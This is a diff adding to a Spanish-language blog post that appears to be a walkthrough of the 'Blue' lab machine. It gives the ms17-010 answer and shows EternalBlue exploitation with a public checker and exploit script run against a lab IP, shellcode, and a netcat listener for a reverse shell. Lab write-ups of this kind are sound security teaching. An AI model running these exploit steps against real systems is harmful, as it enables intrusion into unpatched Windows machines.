--- a/_posts/2021-11-11-blue.md
+++ b/_posts/2021-11-11-blue.md
@@ -76,10 +76,53 @@ vemos el resultado del escaneo anterior con la utilidad _extractPors_ y esta nos
 Con los puertos copiados en la clipboard procedemos a realizar un escaneo con _script_ basicos de vulnerabildades de _nmap_
 
 > What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
-> 
+> ms17-010
 
+ahora ya sabemos que es vulnerable a _ethernalblue_, buscamos un exploit manual en _google_
 
+![exploit manual](/assets/images/blue/manual.png)
 
+procedemos a instalar la utilidad
 
+- comandos 
+
+```bash
+> pip install -r requirements.txt
+```
+
+el _script_ tiene una utilidad que nos confirma que la maquina es vulnerable a _ethernalblue_
+
+```bas
+❯ python3 eternal_checker.py 10.10.125.134
+[*] Target OS: Windows 7 Professional 7601 Service Pack 1
+[!] The target is not patched
+=== Testing named pipes ===
+[*] Done
+```
+
+Como vemos, la maquina no esta parchada contra esta vulnerabilidad, procedemos a explotarla
+nos novemos al directorio _shellcode_ como indicaa la "guia" del _scritp_
+
+![configuracion scrit](/assets/images/blue/shell_code.png)
+
+- ejecutamos con la configuración anterior
+- toca ejecutar el comando varias veces puesto que, se bloquea la maquina y/o problemas de _eternalblue_ (algo común)
+
+```bash
+❯ python eternalblue_exploit7.py 10.10.125.134 shellcode/sc_all.bin
+shellcode size: 2205
+numGroomConn: 13
+Target OS: Windows 7 Professional 7601 Service Pack 1
+SMB1 session setup allocate nonpaged pool success
+SMB1 session setup allocate nonpaged pool success
+good response status: INVALID_PARAMETER
+done
+```
+
+en otra consola ponemos nuestra laptop en escucha  y espereamos nuestra _shell_
+
+```bash
+> nc -nlvp 4444
+```
 
 
